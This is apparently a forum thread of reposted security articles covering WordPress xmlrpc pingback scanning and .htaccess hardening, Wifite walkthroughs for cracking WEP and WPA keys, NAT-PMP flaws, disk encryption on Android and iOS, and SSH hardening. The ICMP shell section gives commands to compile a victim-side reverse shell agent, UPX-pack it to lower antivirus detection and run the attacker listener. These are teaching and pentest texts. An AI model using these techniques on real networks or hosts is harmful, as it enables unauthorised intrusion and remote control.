vulnerability affects XML-RPC interface, which is enabled by default, which consequentially made a lot of WordPress installations vulnerable. We can determine if the XML-RPC interface is enabled by visiting the web address http://www.domain.com/xmlrpc.com, which should return the message “XML-RPC server accepts POST requests only.” If we have an older version of WordPress, the XML-RPC interface can be exploited by using the WordPress_pingback_access Metasploit module. We can use that module to discover whether we’re running a WordPress site with the Pingback API enabled. To check whether the Pingback API is enabled by the XML-RPC we have to set the RHOSTS variable to the IP/Domain of the WordPress blog and run the exploit with the run command. To see the vulnerability in action, we can download WordPress 3.5, install and configure it appropriately. Then we can use the WordPress_pingback_access module to scan the site to determine whether it’s vulnerable to the vulnerability or not. Below we can see that pingback is enabled on the WordPress site, which was installed on the server with IP address 192.168.1.2. msf auxiliary(WordPress_pingback_access) > run<strong>[+] 192.168.1.2 - Pingback enabled: </strong> [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(WordPress_pingback_access) > The vulnerability can also be used to port scan internal and external targets, which attackers use to hide their activity, because the scans are coming from WordPress website and not from the attacker. To mitigate the vulnerability, we have to update to the latest WordPress version, but we have to keep in mind that new vulnerabilities are being discovered regularly, so it’s imperative that we constantly update WordPress to keep ourselves from being vulnerable. We can also install the All In One WP Security & Firewall plugin, which helps us harden the WordPress security. Protecting against using XML-RPC Interface Most of the XML-RPC API functions are available here. In order to call most of the functions, we have to be authenticated, as they cannot be called without authentication. Let’s use Burp in order to invoke the sayHello function on the server. The request that needs to be sent to the server can be seen below. The answer where a “Hello!” string has been written into the response can be seen below. An attacker can use the request presented below in order to bruteforce the password of the enumerated username. If an attacker used the wpscan tool to enumerate the admin user, it can further use the XML-RPC API to bruteforce the password of the administrator. The request that needed to be sent to the server can be seen below. If the username and password exist in the system, the actual post will be returned in the response as presented below. We’ve established that the xmlrpc.php file is dangerous for various things and access to it should be restricted. There are a number of solutions which one can use to protect against xmlrpc.php attacks, which are presented below. Using .htaccess to Restrict Access Completely We can use the .htaccess file to restrict access to the xmlrpc.php file. First we have to set the AllowOverride option in /etc/apache2/sites-available/default to the correct value. The AllowOverride option specifies the types of directives that are allowed in the .htaccess files. We can see that AllowOverride is set to None by default in Apache versions 2.3.9 and earlier. In order to allow .htaccess to overwrite certain directives, we have to set it to one of the directive types, but in most cases we can set it to All; We can restrict the options available in certain directory by using the Options directive. The Options directive can be set to one of the following values: None: none of the extra features are enabled. All: all options except MultiViews are enabled. FollowSymlinks: the server will follow symlinks in this directory. Includes: enables server-side includes provided by the mod_include module. IncludesNOEXEC: enables server-side includes provided by the mod_include module, but disables cmd/cgi. Indexes: if a directory is requests a directory listing is returned in the absence of DirectoryIndex (e.g. index.html). MultiViews: enables mod_negotiation. SymLinksIfOwnerMatch: the server will only follow symlinks for which the file/directory are owned by the same user as the symlink itself. When the “AllowOverride None” is set, the server will respond with 200 OK messages as presented below. This means that the server is not denying access to the xmlrpc.php file, because the .htaccess is not able to override the options specified in the Apache default configuration file. When the “AllowOverride All” is set, we have to add appropriate .htaccess file with the following contents to the /var/www/ directory (the same directory, which contains the xmlrpc.php file). <Files xmlrpc.php> Order Deny,Allow Deny from all </Files> Since the .htaccess is able to override the options specified in the default Apache configuration file, the access to the xmlrpc.php is denied. The server will respond with 403 forbidden messages as presented below. Using .htaccess to Allow Access for Trusted IPs A large portion of the previous section also applies here: we have to set the AllowOverride appropriately, but use a different .htaccess in order to deny access to anybody but specific IP addresses. We can use the following .htaccess file to allow IP address 1.2.3.4 to call the xmlrpc.php file. <Files xmlrpc.php> Order Deny,Allow Deny from all Allow from 1.2.3.4 </Files> Deleting the File Completely Protecting the .htaccess from arbitrary IP addresses but allowing it from certain IP addresses is the best solution that we can use. In any case, if you don’t want to go into all this trouble, you can also delete the xmlrpc.php file altogether. The file is optional and the WordPress installation doesn’t depend on it, so it can safely be removed. Keep in mind that by removing the file you’ll not be able to use some XMLRPC functionality, which is why you should delete the file only when you’re absolutely sure you’ll not be using it. If we take a look at the returned response HTTP headers, we can see the X-Pingback header is still being set as presented below. Various worms use the value of the HTTP header to scan whether XMLRPC interface is enabled or not. In cases where the interface is enabled, the attack progresses further, otherwise the attackers move to the next WordPress website. HTTP/1.1 200 OK Date: Mon, 13 Oct 2014 21:08:05 GMT Server: Apache X-Pingback: <strong>http://192.168.1.2/xmlrpc.php </strong> Vary: Accept-Encoding Content-Length: 6882 Content-Type: text/html; charset=UTF-8 In order to ensure the XMLRCP interface is disclosed in X-Pingback HTTP header, the following can be added to the .htaccess file, which will remove the X-Pingback HTTP header from every response. <IfModule mod_headers.c> Header unset X-Pingback </IfModule> Protecting against Clickjacking To protect against a clickjacking attack, the WordPress web site has to return the X-FRAME-OPTIONS HTTP header in every response, which will prevent the webpage to be included into another page by using iframe elements. In order to do that, we can use the mod_headers module, which we can enable by running the following commands. The X-Content-Type-Options is used to prevent content spoofing in older web browsers. # a2enmod headers # /etc/init.d/apache2 restart Then we need to edit the .htaccess file and add the following options in order for relevant HTTP headers to be added in every response. The X-XSS-Protection is used to enable the XSS protections in the web browser itself – if the value of X-XSS-Protection HTTP header is set to 0, the anti-xss filter in Chrome web browser will be effectively disabled (as if we passed the –disable-xss-auditor as a command-line parameter when starting Chrome)”. The X-Frame-Options is set to SAMEORIGIN, which allows only the current domain to frame content of the web page, while framing content from an arbitrary domain is not allowed. <IfModule mod_headers.c> Header set X-XSS-Protection "1" Header always append X-Frame-Options "SAMEORIGIN" Header set X-Content-Type-Options: "nosniff" </IfModule> Protecting against Accessible Administrative Interface When accessing the /wp-admin/ URL in a web browser, WordPress will automatically redirect us to /wp-login.php. In order to protect against attackers trying to guess our password by using a bruteforce or dictionary attack, we can either enable administrative interface to certain IPs only or enable a secondary Basic authentication. To protect the login web page wp-login.php, we have to put the following into the /var/www/.htaccess file, which allows only the IP address 1.2.3.4 to access the wp-login.php file. <Files wp-login.php> Order Deny,Allow Deny from all Allow from 1.2.3.4 </Files> Additionally, we can also protect /wp-admin/ directory by placing the following content into the /var/www/wp-admin/.htaccess file. <FilesMatch ".*"> Order Deny,Allow Deny from all Allow from 1.2.3.4 </FilesMatch> If we would like to use Basic authentication, we can place the following into .htaccess file. Whenever accessing the /wp-login.php, a popup will show asking us for the basic password. Note that the “/var/.htpasswd” file can be created by using “htpasswd -c /var/.htpasswd user” command. <Files wp-login.php> AuthUserFile /var/.htpasswd AuthType Basic AuthName "Authentication required" Require valid-user Order Allow,Deny Allow from all </Files> Alternatively, we can use Basic authentication together with IP address filtering by slightly changing the .htaccess file into the following. <Files wp-login.php> AuthUserFile /var/.htpasswd AuthType Basic AuthName "Authentication required" Require valid-user Order Deny,Allow Deny from all Allow from 1.2.3.4 </Files> Conclusion We’ve seen that protecting every WordPress installation is not an easy task and should not be taken lightly. In order to protect our WordPress installation, we have to follow the guidelines presented above; most importantly, we have to restrict access to sensitive web pages like /wp-admin/ administrative interface, which could allow attackers to bruteforce the password and gain administrative rights. After performing all the steps outlined in the article above, we have to realize that security is an ongoing process. Whenever installing a new version of a plugin, the readme.html, readme.txt and changelog.txt files will be brought with it, which is why we should delete them after updating the plugin. The same is true when updating WordPress itself. Remember that security is not a once in a lifetime process, which we have to apply after installation of a WordPress website, but is a process which is alive by itself. Therefore, we must be constantly on alert when it comes to security, because there’s no telling which techniques attackers will come up with in order to further attack the WordPress website. Source
  18. Aerosol
    Wifite Walkthrough part 1 In this article series, we will look at a tool named Wifite suitable for automated auditing of wireless networks. Most of you who have experience in wireless pentesting would use tools like airmon-ng, aireplay-ng, airodump-ng, aircrack-ng to crack wireless networks. This would involve a sequence of steps, like capturing a specific numbers of IV’s in case of WEP, capturing the WPA handshake in case of WPA etc, and then subsequently using aircrack-ng to crack the password required for authentication to the network. Wifite aims to ease this process by using a wrapper over all these tools and thus making it super easy to crack Wifi networks. Here is a list of features of Wifite as per its official homepage. sorts targets by signal strength (in dB); cracks closest access points first automatically de-authenticates clients of hidden networks to reveal SSIDs numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) customizable settings (timeouts, packets/sec, etc) “anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete all captured WPA handshakes are backed up to wifite.py’s current directory smart WPA de-authentication; cycles between all clients and broadcast deauths stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit displays session summary at exit; shows any cracked keys all passwords saved to cracked.txt built-in updater: ./wifite.py -upgrade Before we start using wifite, make sure you have a proper wireless card that supports packet injection. If you don’t have one, i would suggest that you buy this card. Note that there is a bug in Wifite that may or may not be there in your particular version of Wifite. The bug basically doesn’t aireplay-ng to function properly and displays an error like aireplay-ng exited unexpectedly . In order to fix this, you will have to make slight modifications in the code of wifite. You can install gedit (apt-get install gedit) which is a text editor and then edit the wifite python script (found in /usr/bin/wifite) using the steps mentioned here. To open wifite, use the command gedit /usr/bin/wifite. This will open up the source code of wifite. Then replace every occurence of cmd = [‘aireplay-ng’, with cmd = [‘aireplay-ng’,’–ignore-negative-one’, Wifite can be found under Applications -> Kali Linux -> Wireless Attacks -> 802.11 Wireless Tools. Also, note that if you are running wifite in a different VM than Kali Linux, then you have to make sure that tools like airmon-ng, aireplay-ng, airodump-ng, aircrack-ng are already installed on that system. This is because Wifite is nothing but a wrapper over all these tools. Before we even start using Wifite, it is better to update to the latest version. In my case, i already have the latest version. In this tutorial, we will be targeting a simple Wifi network with WEP encryption. Just using the command wifite -h will give you a list of all the commands. A very tempting option would be -all which tries to attack every network that it finds. We will try it in later articles in this series. However, first lets take a look at all the targets that we have. To do that, use the command wifite -showb Once this is done, we can see that wifite has put our network interface card into monitor mode (using airmon-ng) and started to look for clients. After a few more seconds, it will start displaying the list of access points. Note that as it is mentioned in its feature list (automatically de-authenticates clients of hidden networks to reveal SSIDs), this list will also include hidden access points. Hence, wifite can also be used to find hidden access points. In this case we will attack an access point with the BSSID 00:26:75:02:EF:65 that i have set up for testing purposes. The access point has a simple WEP password 1234567890. To start attacking an access point, just press Ctrl+C. Wifite will now ask you to choose a target number from the list. The target number for my test network is 1, so let me enter that. Note that if you press Ctrl+C again, it will quit Wifite. You can now see that Wifite will start attempting to crack the WEP access point using the different known techniques for cracking WEP encryption. After some unsuccessful tries, it has finally begun to start attacking the access points using different techniques for cracking WEP. Once enough IV’s are being captured, it will automatically start cracking the password. As we can see, Wifite has successfully figured out the WEP key for the access point. Wifite is an extremely useful tool for cracking wireless networks. As i mentioned previously, you need to have all the tools like airmon-ng, aireplay-ng, airodump-ng, aircrack-ng already installed on your system. To further prove the point, let’s dive into the source code of Wifite. As we can see, the python code has mentions of calling aireplay-ng. Hence, it is recommended to run Wifite inside Kali linux. In the next article, we will look at some advanced usage options of Wifite. Wifite Walkthrough part 2 In this article, we will look at cracking access points using WPA-PSK or WPA2-PSK using Wifite. If you have used tools like airodump-ng, aircrack-ng etc to crack WPA access points before, you would know that the required thing to successfully crack a WPA-PSK network is a captured WPA four-way handshake. More details about the WPA four-way handshake can be found on this wikipedia page. As mentioned in the previous article, there is a bug in Wifite that may or may not be there in your particular version of Wifite. The bug basically doesn’t aireplay-ng to function properly and displays an error like aireplay-ng exited unexpectedly . In order to fix this, you will have to make slight modifications in the code of wifite. You can install gedit (apt-get install gedit) which is a text editor and then edit the wifite python script (found in /usr/bin/wifite) using the steps mentioned here. To open wifite, use the command gedit /usr/bin/wifite. This will open up the source code of wifite. Then replace every occurence of cmd = [‘aireplay-ng’, with cmd = [‘aireplay-ng’,’–ignore-negative-one’, To start wifite for cracking a WPA access point, give it the option -wpa to only target WPA networks. Also, give it a dictionary file as an input for cracking the WPA passphrase with the -dict option. In kali linux, the wordlists are stored at the location /usr/share/wordlists. Wifite will now start scanning for WPA access points. Press Ctrl+C to give a target number. In my case, the target number is 2 which is an access point i have configured for testing purposes. The access point uses WPA2-PSK encryption with the key as “password”. Wifite will now start listening for the handshake. Once it has found it, it will automatically start cracking the passphrase using the dictionary file that we supplied. And as you can see, Wifite has successfully found the passphrase for the access point. Sometimes, things may not work as smoothly. In order to capture a WPA handshake between the client and the access point, the client has to connect to the wireless network during that period when we are monitoring the network. If the client is already connected, there will be no handshake that is captured. Wifite does this by automatically sending deauthentication packets to a particular client or a broadcast deauthentication packet if it is required. You can specify the time between deauthentication packets using the -wpadt flag. Hence, when the client tries to reconnect to the access point, the handshake is captured. You can also specify which tool you want to use to crack the passphrase once the four-way handshake has been successfully captured. By default, aircrack-ng is selected. You can also use cowpatty, pyrit or tshark to crack the passphrase. Another cool option in Wifite is to anonymize your MAC address using the -mac option. Even though it is quite trivial using simple commands or macchanger utility to change the MAC address for a specific interface, it is good to have this feature in the tool itself. However, in order to make this work, you first have to take that specific interface for which you want to change the MAC address down to managed mode if it is in monitor mode previously. You can use the command iwconfig to check all the interfaces that are in monitor mode and then take them down using the command airmon-ng stop interface-name command. As we can see from the image below, the mon0 interface is in monitor mode. Hence, lets take it down using the command airmon-ng stop mon0 Now we can add the -mac option to anonymize the MAC address. As you can see, Wifite is intelligent enough to change the MAC address to something that is similar the existing MAC address of the interface and not to something ridiculous (for e.g AA:BB:CC:DD:EE:FF) which is a giveaway. And when you stop the capture, Wifite is nice enough to change the MAC address back to the original one. In this article, we looked at how we can use Wifite to crack networks using WPA-PSK or WPA2-PSK. Wifite is great at its job and automates almost everything, however it is important to understand how it uses the tools like airodump-ng, aircrack-ng etc under the hood to perform its task. I would recommend that you go through the source code of Wifite and figure out how this is done. Part1 & Part2
  19. Aerosol
    In this article we will learn about the latest NAT-PMP vulnerability being discovered, which will affect around 1.2 billion SOHO routers worldwide. What is a SOHO network? SOHO stands for small office/home office which is a type of LAN network being designed for very small networks. A SOHO network can be a mix of wired and wireless computers. What is NAT-PMP? First, let’s refresh our concept of how traditional NAT works and why NAT-PMP was even required. NAT devices have one or more external IP address associated with it. Enterprise internal architecture sits behind the NAT device. Clients which sit behind the NAT network use NAT device as their default gateway. When a packet from any device behind the NAT is sent to an address on the public Internet, the packet first passes through the NAT box. The NAT box looks at the source port and address. During this transmission of packets, NAT creates a mapping from the internal address and internal port to an external address and external port if a mapping does not already exist. The NAT box replaces the internal address and port in the packet with the external entries from the mapping and sends the packet on to the next gateway. On receiving a packet from the internet on the external interface, the NAT will look up the destination address and port (external address and port) in the list of mappings. If an entry is found, it will contain the internal address and port to which the packet should be sent. The NAT gateway will then rewrite the destination address and port with those from the mapping and forward the packet to the new destination addresses. If the packet does not match any mapping, the packet will most likely be dropped. The important thing to note is that if there is no mapping, the NAT does not know to which internal address the packet should be sent. Mappings are usually created automatically as a result of observing outbound packets. Manual configuration of mapping is to map an external port to a specific internal IP address and port to allow incoming connections to the device with that internal address. A manual configuration can also be done to forward the traffic to a particular IP in case no mapping is found. To address the port mapping issue, NAT-PMP emerged, which allows client s to operate more like a host directly connected to the public network. NAT-PMP allows client hosts to communicate with the NAT gateway to request the creation of inbound mappings on demand. By creating a NAT mapping to allow inbound connections, the client can record its external IPv4 address and external port in a public registry like public DNS to make it accessible to peers that wish to communicate with it. Below are the steps that can work with NAT-PMP. Internal client requests to map UDP port 9999 from the Internet to its UDP port 9999. The NAT-PMP compatible NAT device will respond. If the exact mapping was possible, then outside traffic port 9999/UDP has been forwarded to your port 9999/UDP. If exact mapping is not possible, then a random-port/UDP has been forwarded to your port 9999/UDP. Client then asks for the public address of the NAT-PMP device. NAT device responds with its address, e.g. p.q.r.s. After receiving the public address of NAT-PMP device, the internal client can now advertise about their service bound to port like p.q.r.s:9999/UDP to allow hosts from the Internet to connect to its services. NAT-PMP Vulnerability Details RFC 6886 clearly states that: The root cause of the vulnerabilities is because of violation of these requirements by vendors. The following vulnerabilities can be carried out on a NAT-PMP device if configuration is not done properly. These vulnerabilities have been discovered by the Rapid 7 team. Interception of Internal and External Traffic If NAT-PMP is incorrectly configured to set its external interface as its internal interface which the client uses as their gateway, then it is possible for remote attackers to intercept TCP or UDP traffic destined to the internal interface of a NAT-PMP device. Since the internal interface is controlled by the attacker now, then all further attacks such as DNS, HTTP/Scan can be exploited. Similarly, external traffic can also be intercepted if a NAT-PMP device is incorrectly configured to set its NAT-PMP external interface to be the external interface that faces the public Internet and listens for NAT-PMP messages on both the internal and external interfaces. If this is the configuration, then it is possible for remote attackers from outside to intercept arbitrary TCP and UDP traffic destined from external hosts to and perhaps through the NAT-PMP device’s external interface. Devices vulnerable to this will report the external address to be something external, often the public IPv4 address on the Internet. This attack can also be used to cause the NAT-PMP device to respond to and forward traffic for services it isn’t even listening on. For example, if the NAT-PMP device does not have a listening HTTP service on the external interface, this same flaw could be used to redirect inbound HTTP requests to another external host, making it appear that HTTP content hosted on the external host is hosted by the NAT-PMP device. Internal NAT Client Services Exposed Since internal and external traffic can be hacked and crafted to listen for external IPs for messages, and if NAT-PMP is incorrectly configured to listen for NAT-PMP messages on an untrusted interface such was a WAN interface connected to the Internet, it is possible to create mappings by spoofing NAT-PMP mapping requests by using a source address that matches a valid, internal network range served by the NAT-PMP device. Denial of Service Because the internal and external traffic can be controlled, then it is possible to redirect the NAT-PMP messages to an altogether different host, and further mappings can be restricted. References https://tools.ietf.org/html/rfc6886 https://community.rapid7.com/community/metasploit/blog/2014/10/21/r7-2014-17-nat-pmp-implementation-and-configuration-vulnerabilities Source
  20. Aerosol
    What are shells? Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.). Types of shells Reverse shell Bind shell Reverse shell A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved. Figure 1: Reverse TCP shell Bind shell Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server. Figure 2: Bind TCP shell There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc. One thing which is common between all these shells is that they all communicate over a TCP protocol. Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection). Figure 3: Firewall blocks bind & reverse connection But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol. ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices. When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE. Images below show the PING echo request-response communication taking place between two network devices. Figure 4: Ping echo request Figure 5: Ping echo response Looking at the ping echo request and response, we can see that the ping echo request ICMP packet sent by network device A (10.0.0.7) contains 48 bytes of data. Network device B (10.0.0.8) replies with a ping echo response with the same 48 bytes of data. See the image below: Figure 6: ICMP header format As you can see, the packet does not contain source and destination port numbers like TCP and UDP header formats. Hence, echo request-response communication is taking place between the network devices, but not over specific port(s). The above discussion laid down little idea that ICMP communication can be used to contact between two devices using a custom agent running on victim and attacking devices. The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution. The server ICMP Agent sends ICMP packets to connect to the victim running a custom ICMP agent and sends it commands to execute. Figure 7: Command execution over ICMP Nico Leidecker (leidecker.info) has been kind enough to build ICMP Shell, which runs on a master-slave model. Master is the server ICMP agent (attacker) and slave is the client ICMP agent (victim). At present, the client agent supports Windows platforms only (EXE file) and the client agent can be run on any platform using C, Perl and Python. ICMP Shell can be found on GitHub here: https://github.com/interference-security/icmpsh. Note: Forked and modified from https://github.com/inquisb/icmpsh. “icmp-s.c” is the slave file which is run on victim machine on which remote command execution is to be achieved. This C code, when compiled and executed, asks the user to enter required details as command line arguments. “icmp-slave-complete.c” is the complete slave file which has hard-coded values of required details so that command line arguments are not needed and the compiled executable can be executed directly. ICMP Shell requires the following details: Line No. Field Description 187 target IP address of the attacker’s machine 189 delay Delay between requests (milliseconds) 191 timeout Timeout value (milliseconds) 195 max_blanks Maximum unanswered ICMP requests 197 max_data_size Maximum data buffer size in bytes It can easily be compiled using MingW on both Linux and Windows. I will be demonstrating how to compile on Linux. Install MingW and run the following command to compile the C file: i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe Figure 8: Compile code and generate Windows executable Compress the executable using UPX Packer: upx -9 -v -o icmp-slave-complete-upx.exe icmp-slave-complete.exe Figure 10: File size difference Make sure that ICMP replies set by the OS are disabled: sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null Execute the master ICMP Shell Agent: ./icmpsh_m.py <attacker_ip> <target_ip> ./icmpsh_m.py 10.0.0.8 10.0.0.11 After starting the listener on the attacker’s machine, run the ICMP slave agent on the victim’s machine. Figure 11: Reverse shell on attacking machine over ICMP Using Wireshark, we can see the communication taking place between the attacker and victim machines. Initially the packet transmission contains no data: Figure 12: No data in ICMP packets When the attacker machine receives a reverse connection from the victim machine, this how the data looks: Figure 13: Victim connected to attacker machine Sending a command from the attacker’s machine to the victim’s machine: Figure 14: Command sent by attacker Response received from the victim’s machine: Figure 15: Output of executed command Note that in the received response above, the output of the command is not complete and the data size is 128 bytes. This is because we had set the data buffer size (max_buffer_size) as 128 bytes in source code. The remaining of the output is set in further sets of 128 bytes ’til it is completed. Last but not the least is checking the antivirus detection score: Figure 16: VirusTotal scan result Most probably the detection ratio hit 2 because of UPX packing. ICMP Shell is a really good development by Nico Leidecker, and someday, after some more work, it may also become part of the popular Metasploit Framework. Source
  21. Aerosol
    Introduction Mobile devices these days handle lots of sensitive information – messages, photos, contacts and more. The question about how this data is stored on the device will obviously arise, especially since mobile devices are more prone to theft. In this article, we will explore why data on a device needs to be encrypted and how it is done with respect to different platforms such as Android and iOS. Screen lock is never a savior! Never assume that the screen lock you configured on your phone is going to prevent an attacker from getting access to the data present on the device. Screen lock can be seen as a lock on a door – without the key, people cannot normally come in and access the ‘belongings’ (data in this case). But if a thief somehow comes in, he can happily access all the belongings, for example by reading the data directly off the memory chip. So the simple point is that even with screen lock turned ON, a skillful hacker can still get access to data sitting on the device. This is where encryption comes into picture. Encryption makes the information unreadable even if an attacker somehow manages to access the data. Please note that disk encryption only protects your phone when it is turned off (i.e., it protects data at rest). Once the device is turned on, data will obviously be decrypted, as it needs to be used. How to turn it on Android’s encryption feature is disabled by default. Google does not allow pattern-locks and face recognition in combination with disk encryption. After ensuring that the device has a PIN or password, navigate to ‘Settings’ > ‘Security’ > ‘Encrypt phone’. A warning message is displayed, and then it will take at least an hour to complete. How Android encryption works In Android, full disk encryption was introduced in the Honeycomb version and didn’t change much until recent Kit Kat version. Although it is named FDE (full disk encryption), Android encrypts only user partitions, not the full disk. Any encryption scheme has two important items – algorithm & key. Now let us see some of the important points about how Android 3.0 encrypts its data on the device. We know that Android is built with a Linux kernel and so it rightly uses dm-crypt to implement disk encryption for the userdata (present under /data partition). dm-crypt supports different ciphers. Based on the user entered PIN/Passcode, AES-128 Key Encryption Key (KEK) is calculated. This KEK is again used to encrypt the Disk Encryption Key (DEK) (‘master key’). Thus there are two encryption keys which are mainly dependent on the user entered PIN/Passcode. So when the device is booted, this is what happens: Android takes the passphrase the user has entered, runs it through PBKDF2, decrypts the ‘master key’ (DEK) and passes it to dm-crypt in order to mount the encrypted userdata partition. Encryption parameters are stored in something called ‘crypto footer’. This is located in the metadata in most of the devices. Practically speaking, the security of this entire story depends on the passphrase the user sets. If it is very long, it makes brute forcing difficult. But most people would set a 4 digit PIN, because who would want to enter a 16 digit password with alphabets and special characters every time you want to make a call or send a message? This actually makes brute forcing it very easy. Brute forcing on the device is impractical, as there a time limiting factor upon unsuccessful attempts. Hence to brute force, we will have to obtain a copy of the ‘crypto footer’ and the encrypted userdata partition. After this, the passphrase can be guessed offline by brute forcing. Of course, this involves advanced stuff such as booting a recovery image, etc., because obtaining a raw copy is not directly possible. A 4 digit PIN can be cracked using normal tools and a CPU in a few minutes. Hence it’s important to have a pretty strong password if you really do not want your disk encryption to be cracked. Whatever we have seen above, it’s with respect to Android 3.0. Coming to Android 4.4, there is one big improvement – replacing the PBKDF2 key derivation function (discussed above) with ‘scrypt’. Scrypt is hard to crack and is very much slower compared to PBKDF2. It’s not impossible to crack, but it is certainly slow compared to the previous Android 3.0 case. How is it going to change in Android L? Android L is the next coming version of Android. Here are some of the key points. Full disk encryption is enabled by default! Encrypting a device no longer requires setting a lock screen PIN or password, which suggests that the KEK is no longer directly derived from the lock screen password. At the time of writing, no announcement was made regarding the hardware encryption keys, but it is expected that this version would have hardware protection for encryption keys. If the encryption is enabled by default, it would prevent both hackers and law enforcement agencies from accessing the information on the device. Now this is something similar to the way iPhone handles disk encryption. How Apple’s encryption works on mobile iOS Apple was a front runner in implementing some sort of encryption long before others even thought about it. Apple uses a 256-bit device-unique secret key (UID) stored in the phone’s hardware, where it’s hard to extract from. Apple says this UID is unique to the device and it doesn’t store these values. It also says that no software or hardware can read this key. This UID is mixed with the passcode to generate a new key (passcode key) to secure data on the device. Unlike Android, this UID key can’t be extracted from the device, so all the brute forcing attempts have to be done on the device itself. As per Apple, the content of a file is encrypted with a per-file key, which is wrapped with a class key and stored in a file’s metadata, which is in turn encrypted with the file system key. The class key is protected with the hardware UID and, for some classes, the user’s passcode. Here is a screenshot of the whole process. The new iOS 8 has only extended this feature to more items which are previously not encrypted – messages, pictures, etc. Both the new improvement in Android and iOS disk encryption will result in making life tough not only for hackers but also for law enforcement agencies. While some argue that users holding keys to their information is absolutely a good move, others say this would prevent government agencies with legal warrants from doing their job. Source
  22. Aerosol
    SSH service running on port 22 is one of the most widely used services on the Internet. There are numerous reasons for its widespread use, among which is direct access to the remote system over a security encrypted communication channel. SSH service distinguishes among lesser used SSH-1 and most common SSH-2 versions. SSH was developed to replace insecure protocols like Telnet and rsh/rexec, which communicate over unencrypted communication channels by sending messages in plaintext. Configuration Options Despite SSH being very secure by itself, there are still various configuration options that can be used to harden SSH security. Most common security options related to the sshd2 daemon running on port 22 are read from /etc/sshd/sshd_config and are presented in the table below. Table 1: Configuration options in /etc/ssh/sshd_config Harden SSH Access Systems in the public cloud are usually accessible from anywhere on the Internet. When SSH access is enabled (most of the time it is), an attacker might use a dictionary or bruteforce attack to try to get access to the system. Most of the time, there aren’t any security measures in place that would limit the number of connection attempts or allow only certain IPs from reaching the server. Therefore, attackers might use a botnet to bruteforce the SSH password, which results in gaining faster access to the system. In order to protect against such attacks, we can use various security implications that harden the security of SSH servers. TCP Wrappers TCP wrappers can be used to specify which IPs are allowed/denied access to the SSH server by utilizing the /etc/hosts.allow and /etc/hosts.deny files. To check whether the sshd daemon was compiled with TCP wrappers, we can issue the ldd command to check whether the libwrap is one of the shared libraries of the executable. An example of good security is adding your own IP address into /etc/hosts.allow to prevent locking yourself out of the server. By specifying your IP address as allowed, that IP will not be blocked even if you issue a bruteforce attack against one of the users. DenyHosts We’ve already presented that attackers are often trying to bruteforce the password used by users that have access to the SSH server. There are multiple solutions available, but a widely used option is DenyHosts, which will be described here. DenyHosts monitors invalid login attempts and blocks the originating IP from where the authentication requests are coming from. To enable the protection, we basically have to install the denyhosts package by using our package manager like apt-get. Then we have to edit the /etc/denyhosts.conf configuration file and change the SMTP settings to allow sending emails to the administrator upon blocking a certain IP. After editing the configuration file, we only have to restart the denyhosts service. Port Knocking and Single Packet Authorization Port knocking is a technique used together with a firewall to open specific ports upon receiving a port knock. We’ve already said that SSH is often enabled in cloud servers, because of a need for remote administration, but in such cases port 22 needs to be open in order for clients to be able to connect to the server. With port knocking this needn’t be the case –most of the time, ports to access the SSH server can be closed and can open only on a specific port knock. Port knocking is a technique which uses packet headers to communicate secret information to the server in order to open specific port. Secret information transferred to the server to open specific ports can be encoded by using different techniques: Port Knocking using Port Sequence: the secret knock can be embedded as an ordered sequence of ports for which SYN packets need to be received in order for secret knock to be valid. When the correct sequence of SYN packets to correct ports is received, a client will be allowed to access the port. This method is basically quite limited, as it implements security through obscurity, because an attacker can still bruteforce the order of ports for which SYN packets needs to be sent. Other attacks, such as packet relaying attack, are also possible and defeat the port sequence port knocking security measure: this is because packets needed to be sent to the remote server are always the same and do not change, which makes them easy to sniff and replay. Single Packet Authorization using Packet Payload: by using this technique, the secret information is not embedded in packet headers, but rather in a packet payload. Prior to issuing a port knocking sequence, a secure encrypted communication channel is established with the server, which prevents replay attacks, because packets are never the same, since a proper measure of randomness is achieved during the connection establishment. Therefore, even if the attacker is able to sniff every packet exchanged during port knocking, he will not be able to replay them. This option is also safer to use, because the usual packets sent during port knocking don’t look like port scanning attacks, so the firewall won’t block them. The packet payload port knocking technique can be used by installing and configuring fwknop client/server. First we have to install the fwknop-server by using the apt-get: # apt-get install fwknop-server First, we have to edit the /etc/fwknop/fwknop.conf configuration file and change the appropriate configuration option. We shouldn’t change much really; we should set our email address in the EMAIL_ADDRESSES variable and set the interface network card on which SSH is listening to PCAP_INTF (usually the default ‘eth0? value is correct). The PCAP_FILTER directive should be set to the UDP port where the fwknop will be listening for the knock. Edit the /etc/fwknop/access.conf configuration file to set the IP addresses the fwknop is allowed to open – the OPEN_PORTS directive. The KEY specifies the key that must be shared between the client and the server in order for the port knocking to be successful. Note that the KEY needn’t be comprised of numbers only, but letters and special characters can also be used. Then we need to edit iptables rules to deny access to the SSH server, by REJECTing connections to destination port 22 as presented below. Note that the first iptables rule will lock you out of the server if you’re running it over SSH, so you first need to add a rule to temporarily allow your IP no matter what. The iptables-save command saves the current iptables rules to a file, which is important so we can restore from it later on upon booting the computer – otherwise access to the SSH server won’t be rejected. The last command saves the iptables-restore command to the /etc/rc.local, which will be called upon boot to restore the current iptables rules. # iptables -A INPUT -i ppp0 -p tcp -dport 22 -j REJECT # iptables-save > /root/firewall-config # echo "iptables-restore < /root/firewall-config" >> /etc/rc.local Let’s now scan the server by using the nmap command. Below we can see the picture when the server was scanned prior to running fwknopd. Next we can start fwknopd by running a simple command as presented below. # fwknopd 